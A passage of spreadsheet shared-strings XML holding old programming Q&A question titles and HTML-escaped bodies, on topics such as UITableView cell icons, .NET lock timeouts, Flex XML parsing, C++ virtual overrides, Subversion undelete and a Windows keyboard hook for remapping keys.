    <t xml:space="preserve">&lt;p&gt;I have an app with a UITableView, using both icons and disclosure buttons.  I want to update the icon on a row with a "selected" icon, and update the previously-selected row with an "unselected" icon.  I have the code in place, but when I click on the rows, it sets both rows to the "selected" state, even though via debugging I can see that my state variable is being set to the correct row.  If I keep clicking rows I can sometimes get the "unselected" state to show. I suspect it's a refresh issue, but I've tried the setNeedsDisplay method on the cells and the tableView itself, but with no luck.  Anyone run into this before?  BTW, this is in the simulator (2.2.1) - haven't tried it on the device.&lt;/p&gt;
&lt;p&gt;Here's the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath 
    {
        int newRow = [indexPath row];
        int oldRow = [lastIndexPath row];
        if (newRow != oldRow)
        {
        	[[tableView cellForRowAtIndexPath:indexPath] setImage: [UIImage imageNamed:@"IsSelected.png"]];
        	c_oListPtr.c_sCurItem = [[tableView cellForRowAtIndexPath:indexPath] text];
        	[[tableView cellForRowAtIndexPath:lastIndexPath] setImage: [UIImage imageNamed:@"NotSelected.png"]];
        	[lastIndexPath release];
        	lastIndexPath = indexPath;
        	[[tableView cellForRowAtIndexPath:lastIndexPath] setNeedsDisplay];
        	[[tableView cellForRowAtIndexPath:indexPath] setNeedsDisplay];
        	[tableView setNeedsDisplay];
        }
        [tableView deselectRowAtIndexPath:indexPath animated:YES];
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks
-Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where to find novice SAP BAPI coding guides?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been working with applications interfacing with SAP via a web service for a little while now and I want to get into programming the BAPI's behind the web services as well. My company has been using a SAP consultant for the BAPI programming and I'd like to move into filling that role also.&lt;/p&gt;
&lt;p&gt;I have a decent amount of experience with the core functionalities of SAP as an end user, so I'm not completely new there. But I've never done any BAPI programming before and I've had a hard time finding good beginner guides. I'd like to find something for experienced programmers that takes you from the SAP equivalent of "hello world" to writing business critical BAPIs.&lt;/p&gt;
&lt;p&gt;I've heard that BAPI coding is similar to coding in SQL, is that true?&lt;/p&gt;
&lt;p&gt;Also, I'd like to find a free online guide, but I realize that might be wishful thinking so any comprehensive books would also be helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActionScript 2, list of nested movieclips</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;has anyone ever tried to get the list of all the movieclips (even the nested ones) that are on Stage at a specified stopped (and current) frame in Flash 8, AS 2?&lt;/p&gt;
&lt;p&gt;I did the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for(i in _root){
if(typeof(_root[i])=="movieclip"){
trace(_root[i]);}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this is good for a first level search: that is, if inside the movieclips you have other movieclips, you can't reach them. Furthermore, inside a movieclip there can be more then one movieclip.&lt;/p&gt;
&lt;p&gt;Has anyone ever tried to do what I'm trying to do?&lt;/p&gt;
&lt;p&gt;Bye!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should you request timeouts on locks in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In &lt;a href="http://www.pragprog.com/titles/mnee"&gt;Release It!&lt;/a&gt;, Michael Nygard reasons that many catastrophic system failures are often caused by a chain of things going wrong. For example, two threads deadlock. There's now two less threads in the thread pool, so load increases on the other threads increasing &lt;em&gt;their&lt;/em&gt; likelihood of deadlocks. Suddenly, the server does not respond at all, because the thread pool is exhausted, which causes the load balancer to divert traffic to the other servers (who are all running the same code), which increases &lt;em&gt;their&lt;/em&gt; likelihood of deadlocks. Suddenly the whole farm is offline. &lt;/p&gt;
&lt;p&gt;Most RDBMS servers detect deadlocks and decide a "loser" (one transaction is aborted, the other can continue). By contrast, in C#, the &lt;strong&gt;lock&lt;/strong&gt; statement will wait indefinitely for a lock to be acquired. &lt;/p&gt;
&lt;p&gt;You can however call &lt;a href="http://msdn.microsoft.com/en-us/library/system.threading.monitor.tryenter.aspx"&gt;Monitor.TryEnter(lockObject, TimeSpan)&lt;/a&gt; to request a lock or timeout. It returns false if the timeout expires and the lock could not be acquired. Some have &lt;a href="http://www.interact-sw.co.uk/iangblog/2004/03/23/locking"&gt;wrapped this in using statements&lt;/a&gt; to keep a nice syntax. &lt;/p&gt;
&lt;p&gt;So my question is, do you always acquire locks using timeouts, or not? And what issues do timeouts create versus a deadlock scenario? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inserting Dates into HTML Table Cells</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wanting to have a series of dates (mainly Month, Day, Year) displayed within a vertical arrangement of table cells on a web page. The first date needs to be the current date minus one day, with the next date in the sequence be the current date,  The remaining dates need to incrementally be one day in future out to 16 days. &lt;/p&gt;
&lt;p&gt;Can someone provide help me figure out how to do this?  I have looked at and understand a Javascript to manipulate and display a single date (add or subtract) but am unable to get that date in a cell as well as figure out how to display the other multiple dates mentioned above in a HTML table. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I test if IIRF works?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://www.codeplex.com/IIRF/Thread/List.aspx" rel="nofollow"&gt;http://www.codeplex.com/IIRF/Thread/List.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My webhost installed IIRF for me and I am convinced that they did not do it correctly. I've tried numerous examples including one that I know works with apache's mod_rewrite but I can't get anything to work with IIRF. Is there rule or configuration option that you guys have that you know of that will show whether or not the thing is working correctly?&lt;/p&gt;
&lt;p&gt;Even something like rewrite all urls to anothersite.com will will help me right now. I hope you guys realize the reason I came for your help. I can figure out how to do the rewrite rules on my own but I don't know if the errors are because of me or the webhost. I have limited options as well since I am on a shared webhost.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Advice needed on REST URL to be given to 3rd parties to access my site</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Important: This question isn't actually really an ASP.NET question.&lt;/strong&gt; Anyone who knows anything about URLS can answer it. I just happen to be using ASP.NET routing so included that detail.&lt;/p&gt;
&lt;p&gt;In a nutshell my question is : &lt;/p&gt;
&lt;p&gt;"What URL format should I design that i can give to external parties to get to a specific place on my site that will be future proof. [I'm new to creating these 'REST' URLs]."
&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;I need an ASP.NET routing URL that will be given to a third party for tracking marketing campaigns. It is essentially a 'gateway' URL that redirects the user to a specific page on our site which may be the homepage, a special contest or a particular product.&lt;/p&gt;
&lt;p&gt;In addition to &lt;a href="http://stackoverflow.com/questions/257609/which-browsers-plugins-block-httpreferer-from-being-sent"&gt;trying to capture&lt;/a&gt; the &lt;a href="http://mail-archives.apache.org/mod_mbox/roller-dev/200511.mbox/&amp;lt;4377751C.8040507@busybuddha.org" rel="nofollow"&gt;referrer&lt;/a&gt; I will need to receive a partnerId, a campaign number and possibly other parameters. I want to provide a route to do this BUT I want to get it right first time because obviously I cant easily change it once its being used externally.&lt;/p&gt;
&lt;p&gt;How does something like this look?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.MapRoute(
   "3rd-party-campaign-route",
   "campaign/{destination}/{partnerid}/{campaignid}/{custom}",
   new
   {
       controller = "Campaign",
       action = "Redirect",
       custom = (string)null // optional so we need to set it null 
   }
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;campaign&lt;/strong&gt; : possibly don't want the word 'campaign' in the actual link -- since users will see it in the URL bar. i might change this to just something cryptic like 'c'.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;destination&lt;/strong&gt; : dictates which page on our site the link will take the user to. For instance PR to direct the user to products page. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;partnerid&lt;/strong&gt; : the ID for the company that we've assigned - such as SO for Stack overflow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;campaignid&lt;/strong&gt; : campaign id such as 123 - unique to each partner. I have realized that I think I'd prefer for the 3rd party company to be able to manage the campaign ids themselves rather than us providing a website to 'create a campaign'. I'm not
 completely sure about this yet though.      &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;custom&lt;/strong&gt; : custom data (optional). i can add further custom data parameters without breaking existing URLS&lt;/p&gt;
&lt;p&gt;Note: the reason i have 'destination' is because the campaign ID is decided upon by the client so they need to also tell us where the destination of that campaign is. Alternatively they could 'register' a campaign with us. This may be a better solution to avoid people putting in random campaign IDs but I'm not overly concerned about that and i think this system gives more flexibility.&lt;/p&gt;
&lt;p&gt;In addition we want to know perhaps which image they used to link to us (so we can track which banner works the best). I THINK this is a candiate for a new campaignid as opposed to a custom data field but i'm not sure.&lt;/p&gt;
&lt;p&gt;Currently I am using a very primitive URL such as &lt;a href="http://example.com?cid=123" rel="nofollow"&gt;http://example.com?cid=123&lt;/a&gt;. In this case the campaign ID needs to be issued to the third party and it just isn't a very flexible system. I want to move immediately to a new system for new clients.&lt;/p&gt;
&lt;p&gt;Any thoughts on future proofing this system? What may I have missed? I know i can always add new formats but I want to use this format as much as possible if that is a good idea.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Gridlines in excel through interop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any idea where the setting is hiding for turning gridlines off while using excel 2003 from interop?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the most effective way to present and communicate a performance improvement (e.g. percentages, raw data, graphics)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it better to describe improvements using percentages or just the differences in the numbers?  For example if you improved the performance of a critical ETL SQL Query from 4000 msecs to 312 msecs how would you present it as an 'Accomplishment' on a performance review?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data mapper pattern and automated updates of other objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a PHP application using the data mapper pattern to separate my DB from the domain objects. I have a mapper class that returns Site objects based on data from the DB and accepts existing Site objects to be saved back to the DB.&lt;/p&gt;
&lt;p&gt;My problem is that in the system one (and only one) of all the sites has to be marked as the "primary" site, which means that if I set one as the primary, I'd like to be able to automatically unset the current primary.&lt;/p&gt;
&lt;p&gt;So, something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$mapper = new Site_Mapper();
$site = $mapper-&amp;gt;fetch(2);
$site-&amp;gt;isPrimary = true;
$mapper-&amp;gt;save($site);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would somehow in the background automatically do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$mapper = new Site_Mapper();
$site = $mapper-&amp;gt;fetch(1);
$site-&amp;gt;isPrimary = false;
$mapper-&amp;gt;save($site);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Question is, where should the logic for automatically updating the existing primary site go? It has to happen after the object is saved back to the DB, not before, in case the DB query fails and you're left with no site as the primary.&lt;/p&gt;
&lt;p&gt;Cheers, 
Jack&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mathematical formula for calculating call duration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was working for a telecom company some years ago and I had to generate a formula which calculates duration of a call according to the following algorithm:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;t1 is the first period  &lt;/li&gt;
&lt;li&gt;t2 is the recurring period&lt;/li&gt;
&lt;li&gt;RCT is the actual call time (in seconds)&lt;/li&gt;
&lt;li&gt;CD is the effective call duration (for billing purposes)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;if RCT is less than t1, then the CD equals t1&lt;br /&gt;
if RCT is greater than t1, then CD = t1 + x*t2, where x will "round" RCT to the next highest multiple of t2.&lt;/p&gt;
&lt;p&gt;This algorithm translates to: "Charge for the first t1 seconds, then charge every t2 seconds after that".&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;t1	t2	RCT	CD	
60	10	48	60
60	10	65	70
60	10	121	130
30	20	25	30
30	20	35	50
30	20	65	70
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can you create a function / SQL that will return the "call duration" CD?&lt;/p&gt;
&lt;p&gt;Without using if then else ...?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Logging causing XML Parsing to break?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm seeing something very very strange happening in a Flex app I'm maintaining.&lt;/p&gt;
&lt;p&gt;I've been going through it removing all calls to trace() and replacing it with calls into the logging framework (using the built in mx.logging stuff).  After doing so some XML parsing code suddenly broke, and I can't for the life of me figure out why.&lt;/p&gt;
&lt;p&gt;here's the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private var loader:URLLoader; // created elsewhere
private function handleComplete(event:Event):void {    
  default xml namespace = com;
  xml = XML(loader.data);
  var response:XML = new XML(xml..raniResponse);
  //now handles a null response object
  if(xml &amp;amp;&amp;amp; response.children().length() &amp;gt; 0) {
    LOG.debug("Got response.");
    var cityXML:XML = new XML(xml..city);
    var stateXML:XML = new XML(xml..stateProv);
    /* Some extra processing is done here */
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With the code like this, with that LOG.debug() call in place, I get the following error on the line cityXML is defined:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TypeError: Error #1088: The markup in the document following the root element must be well-formed.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I comment out the LOG.debug() call it works fine.&lt;/p&gt;
&lt;p&gt;I thought there might be some weirdness with the custom log target I created, so I removed that.  Currently the only target being used is the built-in trace target.&lt;/p&gt;
&lt;p&gt;Does anyone know what's going on?  Why would a logging call break the XML parsing?  I can't think of anything it could be doing that would break it.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;I did some more tests, and it's just getting weirder.&lt;/p&gt;
&lt;p&gt;I changed the code based on David's comment to use xml..city[0] instead of new XML(xml..city) for both assignments.  This caused the exception to happen a bit later (in some code not shown above where it's referencing cityXML).  So I tried stepping through in the debugger and noticed something odd.&lt;/p&gt;
&lt;p&gt;cityXML was being set to null, while stateXML was getting the proper value.  Looking at the xml object in the debugger showed all the correct data, so it should have been fine.  As a random test I rearranged the code so that stateXML was being loaded first.  After doing that, stateXML is null, while cityXML is correct.&lt;/p&gt;
&lt;p&gt;So, whichever assignment happens immediately after the log is failing, but whatever happens after that worked fine.&lt;/p&gt;
&lt;p&gt;Here's the (somewhat sanitized) XML that's being parsed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&amp;gt;
  &amp;lt;soapenv:Body&amp;gt;
    &amp;lt;com:MyCompanyRANIv.01 xmlns:com="com:myc:rani:1:0:message" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&amp;gt;
      &amp;lt;com:raniResponse&amp;gt;
        &amp;lt;com:telephonyInfo&amp;gt;
          &amp;lt;com:countryCode&amp;gt;1&amp;lt;/com:countryCode&amp;gt;
          &amp;lt;com:telephoneNumber&amp;gt;14121234567&amp;lt;/com:telephoneNumber&amp;gt;
        &amp;lt;/com:telephonyInfo&amp;gt;
        &amp;lt;com:geoInfo&amp;gt;
          &amp;lt;com:coordinates&amp;gt;
            &amp;lt;com:latLon&amp;gt;
              &amp;lt;com:lat&amp;gt;40.49&amp;lt;/com:lat&amp;gt;
              &amp;lt;com:lon&amp;gt;-79.92&amp;lt;/com:lon&amp;gt;
            &amp;lt;/com:latLon&amp;gt;
          &amp;lt;/com:coordinates&amp;gt;
          &amp;lt;com:countryInfo&amp;gt;
            &amp;lt;com:country&amp;gt;
              &amp;lt;com:featureName&amp;gt;United States&amp;lt;/com:featureName&amp;gt;
              &amp;lt;com:featureTypeDescription&amp;gt;United States of America&amp;lt;/com:featureTypeDescription&amp;gt;
              &amp;lt;com:featureCode value="US" system="ISO 3166" family="Country Code" systemVer="1-alpha-2" /&amp;gt;
            &amp;lt;/com:country&amp;gt;
          &amp;lt;/com:countryInfo&amp;gt;
          &amp;lt;com:stateProvInfo&amp;gt;
            &amp;lt;com:stateProv&amp;gt;
              &amp;lt;com:featureName&amp;gt;PENNSYLVANIA&amp;lt;/com:featureName&amp;gt;
              &amp;lt;com:featureTypeDescription xsi:nil="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" /&amp;gt;
              &amp;lt;com:featureCode family="US State Code" system="FIPS State Alpha Code" systemVer="" value="PA" /&amp;gt;
            &amp;lt;/com:stateProv&amp;gt;
          &amp;lt;/com:stateProvInfo&amp;gt;
          &amp;lt;com:regionInfo&amp;gt;
            &amp;lt;com:region&amp;gt;
              &amp;lt;com:featureName xsi:nil="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" /&amp;gt;
              &amp;lt;com:featureTypeDescription xsi:nil="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" /&amp;gt;
              &amp;lt;com:featureCode family="" system="" systemVer="" value="" /&amp;gt;
            &amp;lt;/com:region&amp;gt;
          &amp;lt;/com:regionInfo&amp;gt;
          &amp;lt;com:countyParishInfo&amp;gt;
            &amp;lt;com:countyParish&amp;gt;
              &amp;lt;com:featureName&amp;gt;ALLEGHENY&amp;lt;/com:featureName&amp;gt;
              &amp;lt;com:featureTypeDescription xsi:nil="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" /&amp;gt;
              &amp;lt;com:featureCode family="" system="" systemVer="" value="" /&amp;gt;
            &amp;lt;/com:countyParish&amp;gt;
          &amp;lt;/com:countyParishInfo&amp;gt;
          &amp;lt;com:cityInfo&amp;gt;
            &amp;lt;com:city&amp;gt;
              &amp;lt;com:featureName&amp;gt;PITTSBURGH&amp;lt;/com:featureName&amp;gt;
              &amp;lt;com:featureTypeDescription xsi:nil="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" /&amp;gt;
              &amp;lt;com:featureCode family="" system="" systemVer="" value="" /&amp;gt;
            &amp;lt;/com:city&amp;gt;
          &amp;lt;/com:cityInfo&amp;gt;
          &amp;lt;com:buildingInfo&amp;gt;
            &amp;lt;com:building&amp;gt;
              &amp;lt;com:featureName xsi:nil="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" /&amp;gt;
              &amp;lt;com:featureTypeDescription xsi:nil="true" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" /&amp;gt;
            &amp;lt;/com:building&amp;gt;
          &amp;lt;/com:buildingInfo&amp;gt;
          &amp;lt;com:streetAddress address="" /&amp;gt;
        &amp;lt;/com:geoInfo&amp;gt;
        &amp;lt;com:services host="false" wireless="false" other="false" /&amp;gt;
      &amp;lt;/com:raniResponse&amp;gt;
      &amp;lt;com:raniRequest&amp;gt;
        &amp;lt;com:fullyQualifiedTelephoneNumber&amp;gt;14121234567&amp;lt;/com:fullyQualifiedTelephoneNumber&amp;gt;
      &amp;lt;/com:raniRequest&amp;gt;
    &amp;lt;/com:MyCompanyRANIv.01&amp;gt;
  &amp;lt;/soapenv:Body&amp;gt;
&amp;lt;/soapenv:Envelope&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's wrong with my javascript? Fading images</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to make Javascript change the style of certain DIV IDs by changing their background every few seconds. Basically, a fading header...here's my code, and it just doesn't change the background, at all.&lt;/p&gt;
&lt;p&gt;How do you call a function?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://pixolia.net/sandbox/morph/index.php" rel="nofollow"&gt;http://pixolia.net/sandbox/morph/index.php&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Safely override C++ virtual functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a base class with a virtual function and I want to override that function in a derived class. Is there some way to make the compiler check if the function I declared in the derived class actually overrides a function in the base class? I would like to add some macro or something that ensures that I didn't accidentally declare a new function, instead of overriding the old one.&lt;/p&gt;
&lt;p&gt;Take this example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class parent {
public:
  virtual void handle_event(int something) const {
    // boring default code
  }
};
class child : public parent {
public:
  virtual void handle_event(int something) {
    // new exciting code
  }
};
int main() {
  parent *p = new child();
  p-&amp;gt;handle_event(1);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here &lt;code&gt;parent::handle_event()&lt;/code&gt; is called instead of &lt;code&gt;child::handle_event()&lt;/code&gt;, because the child's method misses the &lt;code&gt;const&lt;/code&gt; declaration and therefore declares a new method. This could also be a typo in the function name or some minor difference in the parameters types. It can also easily happen if the interface of the base class changes and somewhere some derived class wasn't updated to reflect the change.&lt;/p&gt;
&lt;p&gt;Is there some way to avoid this problem, can I somehow tell the compiler or some other tool to check this for me? Any helpful compiler flags (preferably for g++)? How do you avoid these problems?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a simple way to undelete a file in subversion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;These instructions are a little intimidating and confusing: &lt;a href="http://svnbook.red-bean.com/en/1.0/ch04s04.html#svn-ch-4-sect-4.3"&gt;http://svnbook.red-bean.com/en/1.0/ch04s04.html#svn-ch-4-sect-4.3&lt;/a&gt; .
And also they don't seem to mention that it's much simpler if you haven't yet checked in after doing the "&lt;code&gt;svn rm&lt;/code&gt;" [1]. &lt;/p&gt;
&lt;p&gt;So I thought this would be a good place to record a simpler answer for those googling for this.&lt;/p&gt;
&lt;p&gt;[1] To an svn newbie, it might appear that "&lt;code&gt;svn rm&lt;/code&gt;" immediately destroys the file.  I recall doing &lt;code&gt;svn rm&lt;/code&gt; thinking that would just remove it from source control and freaking out when the file itself actually disappeared.  So a sub-question is, what's the right way to remove a file from version control without actually removing your local copy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I simulate key presses to any currently focused window?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to change the keys my keyboard sends to applications. I've already created a global hook and can prevent the keys I want, but I want to now send a new key in place. Here's my hook proc:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LRESULT __declspec (dllexport) HookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    int ret;
    if(nCode &amp;lt; 0)
    {
    	return CallNextHookEx(hHook, nCode, wParam, lParam);
    }
    kbStruct = (KBDLLHOOKSTRUCT*)lParam;
    printf("\nCaught [%x]", kbStruct-&amp;gt;vkCode);
    if(kbStruct-&amp;gt;vkCode == VK_OEM_MINUS)
    {
    	printf(" - oem minus!");
    	keybd_event(VK_DOWN, 72, KEYEVENTF_KEYUP, NULL);
    	return -1;
    }
    else if(kbStruct-&amp;gt;vkCode == VK_OEM_PLUS)
    {
    	printf(" - oem plus!");
    	keybd_event(VK_UP, 75, KEYEVENTF_KEYUP, NULL);
    	return -1;
    }
    return CallNextHookEx(hHook, nCode, wParam, lParam);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried using SendMessage and PostMessage with GetFocus() and GetForegroudWindow(), but can't figure out how to create the LPARAM for WM_KEYUP or WM_KEYDOWN. I also tried keybd_event(), which does simulate the keys (I know because this hook proc catches the simulated key presses), including 5 or 6 different scan codes, but nothing affects my foreground window.&lt;/p&gt;
&lt;p&gt;I am basically trying to turn the zoom bar on my ms3200 into a scroll control, so I may even be sending the wrong keys (UP and DOWN). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are you using Virtual Machine as your primary development enviroment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I have purchased a notebook that cames with Windows Home Basic (that don't have with ASP.Net/IIS. I thought in upgrade the Windows version to one with ASP.Net/IIS, but I thought in another possibility:&lt;/p&gt;
&lt;p&gt;I have an Hard Disk Case with a 360Gb HD. I thought in create a virtual machine with Windows Ultimate (installing too ASP.Net, IIS and Visual Studio 2008) in this HD Case, then I can access my "development enviroment" in any computer that I will work on (my desktop machine and my notebook).&lt;/p&gt;
&lt;p&gt;But I was worried about the performance. I don't have experience working in Virtual Machines (I use it just to quick compatibility tests)...&lt;/p&gt;
&lt;p&gt;Are you using Virtual Machine as your primary development enviroment? What your finds?&lt;/p&gt;
&lt;p&gt;====================&lt;br&gt;
&lt;em&gt;Thanks for your answers! It really did help me! I would like to know too about portability ie.: the virtual machine that I created in my laptop will work in the desktop? I will need re-activate Windows?&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the use of yield break?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/231893/what-does-yield-break-do-in-c"&gt;What does â€œyield break;â€ do in C#?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Can anyone see a use for the "yield break" statement that could not have been otherwise achieved by using "break" or "return".&lt;/p&gt;
&lt;p&gt;This statement seems to be utterly useless. What's more, without this statement, the "yield return X" statement could have been simplified to "yield X", which much more readable.&lt;/p&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make Tomcat pre-compile JSPs on startup?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're using both Apache Tomcat 6.0 and Jetty 6 where I work.  We mostly use Jetty for testing (it's great for running embedded in JUnit tests) and Tomcat for production.&lt;/p&gt;
&lt;p&gt;By default, Tomcat compiles JSPs on-the-fly as users request them.  But this results in degraded performance for the first hit.  It also highlights &lt;a href="https://issues.apache.org/bugzilla/show_bug.cgi?id=43878"&gt;bizarre bugs&lt;/a&gt; in Tomcat's JSP compiler.&lt;/p&gt;
&lt;p&gt;The &lt;a href="http://tomcat.apache.org/tomcat-6.0-doc/jasper-howto.html"&gt;Tomcat documentation&lt;/a&gt; gives recommendations for pre-compiling JSPs at build time using Ant (and a Maven plugin is also available)... but the resulting WAR contains Tomcat-specific stuff e.g. PageContextImpl.proprietaryEvaluate, so we can't use it in Jetty.&lt;/p&gt;
&lt;p&gt;Is there some flag or setting we can use somewhere to force Tomcat to precompile all JSPs as soon as the WAR is initialized?  We're prepared to wait a little longer on startup for this.&lt;/p&gt;
&lt;p&gt;In advance: I know there's a way to pre-compile exactly &lt;em&gt;one&lt;/em&gt; JSP by explicitly identifying a /servlet/load-on-startup tag in web.xml for one JSP.  But for dozens or even hundreds of JSPs that becomes unmanageable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to execute ANT tasks on only files that have been modified</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a build script that does a number of things (minimize javascript, upload to amazon s3 etc). The minimize ANT task only operates on the javascript that I have modified and ignores the rest (I didn't write this script). I would like to do something similar for the amazon s3 task where only the updated content is upload in the task. Any leads on how to do this would be greatly appreciated. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Learning Clojure without Java Knowledge</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, so I'm psyched about another list.  I got myself a copy of the beta Clojure programming book...&lt;/p&gt;
&lt;p&gt;And the one thing I'm noticing most is that it's assumed I know... like all the major java classes.&lt;/p&gt;
&lt;p&gt;Except, generally, I don't really care about Java.  I just want enough knowledge of it for Clojure to be an option for me.&lt;/p&gt;
&lt;p&gt;Any suggestion as to how to learn just what I need of it all?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fact check: how vulnerable are .NET apps to decompilation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across &lt;a href="http://msmobiles.com/news.php/7973.html" rel="nofollow"&gt;this post&lt;/a&gt; on the MSMobiles.com blog that says the following, among other things:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;.Net is great in so many ways but for
  commercial apps? No way! Anybody can
  just look at your source code. A high
  end obfuscator will help a lot but any
  determined hacker will fix your code
  in less than a day. I know this from
  sad experience despite spending $1000s
  on anti-piracy and obfuscation tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It then says the following about developing commercial Windows Mobile apps in .NET:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;be prepared for 1-day delay after
  which your competitors will copy your
  functionality and place their own apps
  with the same functionality in the
  Skymarket&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For those familiar with .NET: is this truth or nonsense? Is this issue somehow specific to Windows Mobile, or does it apply to .NET on Windows as well? This just seemed surprising to me because I know that Microsoft writes a good amount of its own client-side software in .NET (and that many vendors write expensive apps in Java, which apparently has the same problems), and it seems strange that their IP could be stolen so easily.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting a repository from git to subversion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Reasons for doing this aside, is there a reasonable way to &lt;strong&gt;convert an entire git repository to subversion&lt;/strong&gt;?&lt;/p&gt;
&lt;p&gt;I can find only tons on information on migrating &lt;em&gt;from&lt;/em&gt; subversion &lt;em&gt;to&lt;/em&gt; git, and exchanging changesets between the two, but not for doing a simple conversion of the entire git repository to svn. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to best clean up resources for .NET application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best way or method of best practise to ensure that a Winforms .NET application releases all the resources it consumed in the lifecycle of its execution?&lt;/p&gt;
&lt;p&gt;In particular, the release of file handles and images.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically create shortcut keys combo for desktop "shortcut"</t>
  </si>
  <si>
